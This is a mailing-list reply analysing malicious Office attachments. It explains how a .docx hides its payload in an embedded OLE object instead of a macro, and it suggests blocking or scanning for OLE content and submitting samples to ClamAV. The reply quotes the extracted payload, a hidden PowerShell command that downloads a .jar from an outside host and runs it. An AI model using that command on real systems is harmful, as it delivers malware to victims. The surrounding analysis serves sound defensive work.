| 1 |
On 7/5/19 4:25 PM, Hasan Ç. wrote: |
| 2 |
> Sure, i sent you bunch of malicious office attachments. |
| 3 |
> |
| 4 |
|
| 5 |
The only one of these that is a "real" office document is Siparis2.docx, |
| 6 |
and unfortunately it uses a new(ish) exploit technique. Instead of |
| 7 |
placing the code in a macro, the code is embedded in some other OLE |
| 8 |
object, and then the document itself is constructed to trick the user |
| 9 |
into clicking and running that object: |
| 10 |
|
| 11 |
https://www.microsoft.com/security/blog/2016/06/14/wheres-the-macro-malware-author-are-now-using-ole-embedding-to-deliver-malicious-files/ |
| 12 |
|
| 13 |
https://securityriskadvisors.com/blog/the-return-of-ole-exploit-delivery-cve-2018-8174/ |
| 14 |
|
| 15 |
In your example, if you extract Siparis2.docx, you'll find two |
| 16 |
interesting files, |
| 17 |
|
| 18 |
* '[Content_Types].xml' |
| 19 |
* 'word/embeddings/oleObject1.bin |
| 20 |
|
| 21 |
The first one contains a bunch of XML and indicates that this document |
| 22 |
comes with an embedded OLE object, |
| 23 |
|
| 24 |
<Types |
| 25 |
xmlns="http://schemas.openxmlformats.org/package/2006/content-types"> |
| 26 |
<Default Extension="bin" |
| 27 |
ContentType="application/vnd.openxmlformats-officedocument.oleObject"/> |
| 28 |
... |
| 29 |
|
| 30 |
The oleObject1.bin contains the actual exploit, if you scroll down: |
| 31 |
|
| 32 |
|
| 33 |
--++++++-cmd|'/c powershell -executionpolicy bypass -W Hidden -command |
| 34 |
"& { (new-object |
| 35 |
System.Net.WebClient).DownloadFile(\"http://www.qyhhy.ml\" ,\" |
| 36 |
%tmp%\\6uOyYF.jar\") }" & %tmp%\\6uOyYF.jar'!'C14'63 |
| 37 |
|
| 38 |
|
| 39 |
What all this means, is, |
| 40 |
|
| 41 |
1. Microsoft is still fucking stupid. |
| 42 |
2. You won't be able to block these by blocking macros. |
| 43 |
|
| 44 |
For these OLE exploits, I only have two ideas: |
| 45 |
|
| 46 |
1. Block all OLE objects. |
| 47 |
2. Allow OLE objects, and try to catch the bad ones. |
| 48 |
|
| 49 |
The first option will probably cause a lot of false positives, but it |
| 50 |
should at least be doable -- for example, by scanning that XML file, and |
| 51 |
throwing a fit if anything has the oleObject content type. |
| 52 |
|
| 53 |
The second option, as you've already discovered, doesn't work so great. |
| 54 |
You can put anything into an OLE object, so we're back at square one. |
| 55 |
Whenever you find a malicious OLE object, you have to submit it to the |
| 56 |
antivirus companies and wait for them to create a signature. For us, |
| 57 |
that means SaneSecurity and ClamAV, and ClamAV doesn't usually respond |
| 58 |
quickly. Nevertheless, you can submit them here: |
| 59 |
|
| 60 |
https://www.clamav.net/reports/malware |
| 61 |
|
| 62 |
I submitted the oleObject1.bin file above already. |
| 63 |
|
| 64 |
As far as your other files (xls and csv) go... I'm not sure what to |
| 65 |
think about those. It looks like they contain junk, but I'm well aware |
| 66 |
that Excel will try to open them and probably do something stupid in the |
| 67 |
process. But without a copy of Excel and a death wish handy, I don't |
| 68 |
know how to troubleshoot further. (Again, you could always submit them |
| 69 |
to ClamAV and SaneSecurity.) |
Archives